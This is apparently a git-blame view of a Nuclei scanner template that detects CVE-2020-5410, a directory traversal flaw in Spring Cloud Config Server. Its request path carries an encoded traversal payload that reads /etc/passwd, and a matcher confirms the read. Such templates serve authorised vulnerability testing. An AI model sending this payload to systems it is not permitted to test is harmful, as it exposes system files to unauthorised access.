2021-01-02 04:56:15 +00:00
|
|
|
id: CVE-2020-5410
|
2020-06-18 10:16:29 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: Directory Traversal in Spring Cloud Config Server
|
|
|
|
author: mavericknerd
|
|
|
|
severity: high
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2021-01-14 14:41:56 +00:00
|
|
|
- "{{BaseURL}}/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"
|
2021-01-14 14:51:36 +00:00
|
|
|
matchers-condition: and
|
2020-06-18 10:16:29 +00:00
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "root:[x*]:0:0:"
|
|
|
|
part: body
|